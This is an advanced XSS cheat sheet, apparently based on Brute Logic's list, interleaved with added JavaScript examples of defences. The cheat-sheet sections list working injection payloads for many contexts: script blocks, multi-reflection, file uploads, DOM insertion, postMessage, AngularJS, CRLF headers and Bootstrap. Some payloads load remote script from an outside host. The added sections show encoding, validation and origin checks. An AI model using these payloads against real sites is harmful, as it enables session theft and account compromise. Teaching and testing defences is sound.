XSS Advanced
Javascript Context – Code Injection in Logical Block
Use the 1st or 2nd payload when input lands in a script block, inside a string-delimited value and
inside a single logical block such as a function or a conditional (if, else, etc.). If the quote is
escaped with a backslash, use the 3rd payload.
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
Javascript Context – Quoteless Code Injection
Use when there are multiple reflections in the same line of JS code. The 1st payload works in simple JS
variables and the 2nd one works in non-nested JS objects.
-alert(1)//\
-alert(1)}//\
Javascript Context – Placeholder Injection in Template Literal
Use when input lands inside backtick (`) delimited strings or in template engines.
${alert(1)}
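The three JavaScript-context sections above all rely on the same server-side mistake: untrusted input is placed inside a script block with, at most, its quote characters escaped. The following is an added example, not code from the cheat sheet, contrasting that quote-only escaping with serializing the value as a JSON literal. It assumes a hypothetical page shape of `var name = '<INPUT>';` inside a block, and uses the page's own payloads (including the template-literal placeholder) as constructed inputs; nothing is ever executed, the check only scans the emitted literal the way a lexer would.

```javascript
// Added example (not part of the cheat sheet): escaping a quote versus
// serializing a value when server-side code embeds untrusted input in a
// <script> block. Assumed (hypothetical) page shape:
//     <script> if (ok) { var name = '<INPUT>'; } </script>

// Weak approach: escape only the quote delimiter. The page's third payload
// supplies its own backslash, which turns the added escape into a literal
// backslash and leaves the following quote free to close the string.
function escapeQuoteOnly(input) {
  return "'" + input.replace(/'/g, "\\'") + "'";
}

// Hardened approach: emit a JSON string literal, then escape the characters
// that matter to the HTML parser (</script>) and the JS line terminators.
// JSON.stringify doubles backslashes, so a backslash in the input can no
// longer swallow the escape placed in front of a quote.
function toJsLiteral(input) {
  return JSON.stringify(input)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Check helper: scan a quoted literal as a JS lexer would and report whether
// the string ends exactly at the final character. A premature close means
// the input changed the code structure. Nothing is evaluated.
function literalIsIntact(literal) {
  const quote = literal[0];
  for (let i = 1; i < literal.length; i++) {
    const c = literal[i];
    if (c === "\\") { i++; continue; }            // escape: skip next char
    if (c === quote) return i === literal.length - 1;
  }
  return false;                                   // unterminated string
}

// Constructed inputs: the three payloads listed on the page plus the
// template-literal placeholder from the section above.
const PAYLOADS = {
  block: "'}alert(1);{'",
  newline: "'}alert(1)%0A{'",
  backslash: "\\'}alert(1);{//",
  template: "${alert(1)}",
};

// Per payload: does each approach keep the literal intact, and does the
// hardened literal decode back to exactly the original value?
function evaluate() {
  const out = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    out[name] = {
      weakIntact: literalIsIntact(escapeQuoteOnly(p)),
      hardenedIntact: literalIsIntact(toJsLiteral(p)),
      roundTrips: JSON.parse(toJsLiteral(p)) === p,
    };
  }
  return out;
}

console.log(evaluate());
```

The quote-only escape survives the first two payloads and fails on the third, which is exactly what the cheat sheet describes. The JSON literal stays intact for all of them, and because it is never emitted inside backticks the `${...}` placeholder remains inert data rather than an expression.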
Multi Reflection in HTML Context – Double Reflection (Single Input)
Use to take advantage of multiple reflections on the same page.
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
/alert(1)</script><script>/
Multi Reflection in HTML Context – Triple Reflection (Single Input)
Use to take advantage of multiple reflections on the same page.
/alert(1)">'onload="/<svg/1='
-alert(1)">'onload="<svg/1='
/</script>'>alert(1)/<script/1='
Multi Input Reflections (Double & Triple) in HTML Context
Use to take advantage of multiple input reflections on the same page. Also useful in HPP (HTTP
Parameter Pollution) scenarios, where there are reflections for repeated parameters. The 3rd
payload makes use of comma-separated reflections of the same parameter.
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/&r=/alert(1)'>
q=<script/&q=/src=data:&q=alert(1)>
File Upload Injection – Filename
Use when the uploaded filename is reflected somewhere in the target page.
"><svg onload=alert(1)>.gif
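Every HTML-context vector above, from the single-input double reflection to the reflected upload filename, works because the page writes the value into markup without encoding it for the context. The following is an added example, not code from the cheat sheet, showing the contextual encoding that closes all of them at once. It assumes a hypothetical template that reflects one input twice (once as text, once inside a single-quoted attribute), and uses two of the page's payloads as constructed input.

```javascript
// Added example (not part of the cheat sheet): contextual output encoding as
// the defence against the HTML-context payloads above. Assumption: a
// hypothetical template that renders one untrusted value into a text node
// and into a single-quoted attribute value (the "double reflection" case).

// Encode the five characters that can change HTML structure. Encoding the
// quote characters is what makes attribute context safe; encoding < and >
// is what makes text context safe. Do both, always.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Simulated page with two reflections of the same input.
function renderUnsafe(input) {
  return `<p>${input}</p><input value='${input}'>`;
}

function renderSafe(input) {
  return `<p>${encodeHtml(input)}</p><input value='${encodeHtml(input)}'>`;
}

// Test oracle (not a sanitizer): count the start tags in a rendered fragment.
// The template was written with exactly two; any extra tag came from input.
function countStartTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Constructed inputs: the page's double-reflection vector and the reflected
// upload file name.
const INPUTS = {
  doubleReflection: "'onload=alert(1)><svg/1='",
  fileName: '"><svg onload=alert(1)>.gif',
};

function tagCounts() {
  const out = {};
  for (const [k, v] of Object.entries(INPUTS)) {
    out[k] = {
      unsafe: countStartTags(renderUnsafe(v)),
      safe: countStartTags(renderSafe(v)),
    };
  }
  return out;
}

console.log(tagCounts());
```

With the unsafe template each payload turns the two intended tags into four; with encoding applied the count stays at two no matter how many times the value is reflected, which is why multi-reflection tricks stop mattering once every reflection is encoded for its context.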
File Upload Injection – Metadata
Use when metadata of an uploaded file is reflected somewhere in the target page. It uses the
command-line exiftool ("$" is the terminal prompt); any metadata field can be set.
$ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
File Upload Injection – SVG File
Use to create a stored XSS on the target when uploading image files. Save the content below as
"xss.svg".
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
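The three upload sections (filename, metadata, SVG) share one server-side picture: a stored file whose name, metadata or body reaches a browser. The following is an added example, not code from the cheat sheet, of the handling a defender would put on the upload route. It assumes a hypothetical application that stores uploads under a name it normalizes itself, serves them from its own route, and treats SVG as an active document; the allowed-extension list is an assumption for the example.

```javascript
// Added example (not part of the cheat sheet): server-side handling for the
// upload vectors above. Assumptions: the application stores uploads under a
// normalized name, serves them from a route of its own, and only accepts the
// extensions listed here.

const ALLOWED_EXT = new Set([".gif", ".jpeg", ".jpg", ".png", ".svg"]);

// Normalize an uploaded file name: drop any client-supplied directory part,
// keep a conservative character set, collapse runs of replacements and
// require an allowed extension. Output encoding still applies wherever the
// name is displayed; this is defence in depth, not a substitute for it.
function normalizeFileName(original) {
  const base = original.split(/[\\/]/).pop();
  const m = base.match(/\.[A-Za-z0-9]+$/);
  const ext = m ? m[0].toLowerCase() : "";
  if (!ALLOWED_EXT.has(ext)) throw new Error("extension not allowed: " + ext);
  const stem = base.slice(0, base.length - ext.length)
    .replace(/[^A-Za-z0-9._-]/g, "_")
    .replace(/_+/g, "_");
  return stem + ext;
}

// Response headers for serving a stored upload. SVG is an XML document that
// can carry <script> elements and on* handlers (the page's xss.svg uses an
// onload), so it is not served inline from the application origin: it goes
// out as a download under a sandboxing CSP. Raster images are served as-is,
// with sniffing disabled so a renamed HTML file is not promoted to text/html.
function headersForUpload(contentType) {
  const headers = {
    "Content-Type": contentType,
    "X-Content-Type-Options": "nosniff",
  };
  if (contentType === "image/svg+xml") {
    headers["Content-Disposition"] = "attachment";
    headers["Content-Security-Policy"] = "sandbox; script-src 'none'";
  }
  return headers;
}

// Coarse triage for SVG uploads: flag script elements and event-handler
// attributes for rejection or logging. This is a signal, not a sanitizer;
// the header policy above is the control that does not depend on parsing.
function svgHasActiveContent(svgText) {
  return /<script[\s>]/i.test(svgText) || /\son[a-z]+\s*=/i.test(svgText);
}

console.log(normalizeFileName('"><svg onload=alert(1)>.gif'));
console.log(headersForUpload("image/svg+xml"));
```

For the metadata vector, the same two rules apply: encode the field when it is displayed, and strip metadata at upload time if it is not needed (exiftool's `-all=` option removes it). The SVG check deliberately stays a flag rather than a rewrite, since regex-based SVG "cleaning" is easy to get wrong; the attachment plus sandbox headers are what keep a stored SVG from executing in the application's origin.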
DOM Insert Injection
Use to test for XSS when the injection gets inserted into the DOM as valid markup instead of being
reflected in the source code. It works for cases where the script tag and other vectors won't work.
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>
DOM Insert Injection – Resource Request
Use when the page's JavaScript inserts into the page the result of a request to a URL controlled
by the attacker (the injection).
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
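The resource-request case above exists because page script fetches, or assigns to src/href, a URL that the attacker influences; `data:` and `javascript:` URLs then deliver markup or code directly. The following is an added example, not code from the cheat sheet, of the scheme allowlist a page would apply before using such a URL. It assumes a hypothetical application that only ever needs http(s) and same-origin relative URLs there, and uses the two `data:` vectors above plus a few constructed variants as input.

```javascript
// Added example (not part of the cheat sheet): validating an attacker-
// influenced URL before the page's own script fetches it or assigns it to
// src/href. Assumption: the application only needs http(s) and same-origin
// relative URLs in that position.

// Browsers strip tabs, newlines and leading controls/spaces while parsing a
// scheme, so remove them first; otherwise "java\tscript:" is missed.
function stripControls(url) {
  return String(url).replace(/[\u0000-\u0020]/g, "");
}

// Return the lower-cased scheme, or null when the URL has none (relative).
function canonicalScheme(cleaned) {
  const m = cleaned.match(/^([a-zA-Z][a-zA-Z0-9+.-]*):/);
  return m ? m[1].toLowerCase() : null;
}

// Allowlist decision: same-origin relative URLs and http/https are accepted;
// everything else (data:, javascript:, blob:, unknown schemes) is rejected.
// Scheme-relative "//host" and "\\host" forms are rejected too, since they
// resolve to a host of the attacker's choosing.
function isAcceptableUrl(url) {
  const cleaned = stripControls(url);
  const scheme = canonicalScheme(cleaned);
  if (scheme === null) return !/^[\\/]{2}/.test(cleaned);
  return scheme === "http" || scheme === "https";
}

// Constructed inputs: the page's two data: vectors plus benign and
// obfuscated variants.
const CANDIDATES = [
  "data:text/html,<img src=1 onerror=alert(1)>",
  "data:text/html,<iframe src=javascript:alert(1)>",
  "javascript:alert(1)",
  "JaVa\tScRiPt:alert(1)",
  "//evil.example/widget.html",
  "https://cdn.example/widget.html",
  "/api/widget?id=3",
];

// Map each candidate to the allowlist verdict.
function classify(urls = CANDIDATES) {
  return urls.map((u) => [u, isAcceptableUrl(u)]);
}

console.log(classify());
```

For the plain DOM-insert case in the previous section the sibling control is how the fetched result is inserted: assigning it to `textContent` or wrapping it in `createTextNode` keeps it data, whereas `innerHTML` hands it to the parser and makes the img/iframe/details/svg vectors above live.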
PHP_SELF Injection
Use when the current URL is used by the target's underlying PHP code as an attribute value of an
HTML form, for example. Inject between the php extension and the start of the query part (?) using a
leading slash (/).
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
Script Injection – No Closing Tag
Use when there's a closing script tag (</script>) somewhere in the code after the reflection.
<script src=data:,alert(1)>
<script src=//brutelogic.com.br/1.js>
Javascript postMessage() DOM Injection (with Iframe)
Use when there's a "message" event listener like "window.addEventListener('message', ...)" in the
JavaScript code without a check for the origin. The target must be frameable (X-Frame-Options
header according to context). Save as an HTML file (or use data:text/html), providing
TARGET_URL and INJECTION (an XSS vector or payload).
<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
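The precondition for the iframe vector above is a "message" listener that does not check `event.origin`, or checks it loosely. The following is an added example, not code from the cheat sheet, of a listener built around an exact origin allowlist, shown beside the substring check that is commonly found instead. The allowlist, the `applyMessage` handler and the event objects are constructed for the example; in a real page the listener is registered with `window.addEventListener("message", ...)`.

```javascript
// Added example (not part of the cheat sheet): a "message" listener that
// checks event.origin against an exact allowlist, beside the loose check
// whose absence or weakness the iframe payload above depends on.
// Assumptions: ALLOWED_ORIGINS and the applyMessage() handler are the page's
// own; the EVENTS below are constructed to look like browser MessageEvents.

const ALLOWED_ORIGINS = new Set(["https://app.example", "https://admin.app.example"]);

// Loose check seen in the wild: substring match. It accepts any origin that
// merely contains the trusted string.
function looseOriginCheck(origin) {
  return origin.indexOf("https://app.example") !== -1;
}

// Strict check: the origin a browser supplies is scheme://host[:port] with no
// path, so exact set membership is the right comparison.
function strictOriginCheck(origin) {
  return ALLOWED_ORIGINS.has(origin);
}

// Build a listener. It drops messages from other origins, requires a
// structured payload instead of a raw string (so the data is never a blob
// of markup that ends up in innerHTML), then hands the fields to the handler.
function createMessageListener(applyMessage, originCheck = strictOriginCheck) {
  return function onMessage(event) {
    if (!originCheck(event.origin)) return { accepted: false, reason: "origin" };
    const d = event.data;
    if (typeof d !== "object" || d === null || typeof d.type !== "string") {
      return { accepted: false, reason: "shape" };
    }
    applyMessage(d.type, d.payload);
    return { accepted: true };
  };
}

// Constructed events. A sender loaded from a data: URL, as the cheat sheet
// suggests, has an opaque origin, which the browser reports as "null".
const EVENTS = {
  legit: { origin: "https://app.example", data: { type: "theme", payload: "dark" } },
  lookalike: { origin: "https://app.example.attacker.test", data: { type: "theme", payload: "dark" } },
  framed: { origin: "null", data: "<svg onload=alert(1)>" },
};

// Run both listeners over the events and report what each accepted.
function runAll() {
  const applied = [];
  const strict = createMessageListener((t, p) => applied.push([t, p]));
  const loose = createMessageListener((t, p) => applied.push([t, p]), looseOriginCheck);
  return {
    strictLegit: strict(EVENTS.legit).accepted,
    strictLookalike: strict(EVENTS.lookalike).accepted,
    looseLookalike: loose(EVENTS.lookalike).accepted,
    strictFramed: strict(EVENTS.framed).accepted,
    handlerCalls: applied.length,
  };
}

console.log(runAll());
```

Two details carry the weight here: the comparison is equality against a fixed set rather than `indexOf`, `startsWith` or a regex, and the message body is validated for shape before anything is done with it, so even an accepted message cannot be dropped into the DOM as markup.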
XML-Based XSS
Use to inject an XSS vector in an XML page (content types text/xml or application/xml).
Prepend "-->" to the payload if input lands in a comment section or "]]>" if input lands in a
CDATA section.
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="//brutelogic.com.br/1.js"/>
AngularJS Injections (v1.6 and up)
Use when an AngularJS library is loaded in the page, inside an HTML block with the ng-app
directive (1st payload), or create your own (2nd one).
{{$new.constructor('alert(1)')()}}
<x ng-app>{{$new.constructor('alert(1)')()}}
CRLF Injection
Use when the application reflects input in one of the response headers, allowing the injection of
Carriage Return (%0D) and Line Feed (%0A) characters. Vectors for Gecko and WebKit,
respectively.
%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E
%0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E
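The CRLF vectors above only work when a server copies a decoded parameter into a header without checking it for line terminators. The following is an added example, not code from the cheat sheet, that builds a redirect header block both ways and inspects the result the way a client would, using the page's first vector (URL-decoded, as it would arrive at the handler) as constructed input. The redirect endpoint and the `/home` target are hypothetical.

```javascript
// Added example (not part of the cheat sheet): validating a reflected header
// value before it reaches the response. Assumption: a hypothetical redirect
// endpoint copies a decoded query parameter into the Location header.

// Naive: concatenate the decoded value straight into the header block.
function buildHeadersUnsafe(next) {
  return "HTTP/1.1 302 Found\r\nLocation: " + next + "\r\n\r\n";
}

// Hardened: HTTP header values may not contain CR, LF or other control
// characters, so any such character means the value cannot be a header.
function assertHeaderValue(value) {
  if (/[\u0000-\u001f\u007f]/.test(value)) {
    throw new Error("control character in header value");
  }
  return value;
}

function buildHeaders(next) {
  return "HTTP/1.1 302 Found\r\nLocation: " + assertHeaderValue(next) + "\r\n\r\n";
}

// Inspection helper: split a raw response into status line, header lines and
// body as a client would. Injected CRLFs show up as extra headers and a body.
function splitResponse(raw) {
  const idx = raw.indexOf("\r\n\r\n");
  const head = raw.slice(0, idx).split("\r\n");
  return { status: head[0], headers: head.slice(1), body: raw.slice(idx + 4) };
}

// The page's Gecko vector as it arrives after the server URL-decodes it
// (constructed input for this example).
const INJECTED = decodeURIComponent(
  "%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E"
);

// Compare the two builders on a benign value and on the injected one.
function compare() {
  const unsafe = splitResponse(buildHeadersUnsafe("/home" + INJECTED));
  let safeRejected = false;
  try { buildHeaders("/home" + INJECTED); } catch (e) { safeRejected = true; }
  return {
    unsafeHeaderCount: unsafe.headers.length,
    unsafeBody: unsafe.body,
    safeRejected,
    benignHeaderCount: splitResponse(buildHeaders("/home")).headers.length,
  };
}

console.log(compare());
```

Most mature HTTP libraries already refuse header values containing CR or LF; the explicit check matters when the framework is older, when a raw socket or proxy layer writes headers itself, or when the application builds the response text by hand as shown. Rejecting the request (rather than stripping the characters) also gives the log entry that makes this probing visible.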
Onscroll Universal XSS Vector
Use to trigger XSS without user interaction via the onscroll event handler. It works with the
address, blockquote, body, center, dir, div, dl, dt, form, li, menu, ol, p, pre, ul, and h1 to h6
HTML tags.
<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y
XSS in SSI
Use when there’s a Server-Side Include (SSI) injection.
<<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->>
Type Juggling
Use to pass an "if" condition that matches a number in a loose comparison.
1<svg onload=alert(1)>
1"><svg onload=alert(1)>
SQLi Error-Based XSS
Use in endpoints where a SQL error message can be triggered (with a quote or backslash).
'1<svg onload=alert(1)>
<svg onload=alert(1)>\
Bootstrap XSS Vector
Use when there's a Bootstrap library present on the page. It also bypasses the WebKit Auditor; just
click anywhere in the page to trigger. Any char of the href value can be HTML encoded to bypass
filters.
<html data-toggle=tab href="<img src=x onerror=alert(1)>">
Browser Notification
Use as an alternative to alert, prompt and confirm popups. It requires user acceptance (1st
payload), but once the user has previously authorized notifications for that site, the 2nd one can be used.
Notification.requestPermission(x=>{new(Notification)(1)})
new(Notification)(1)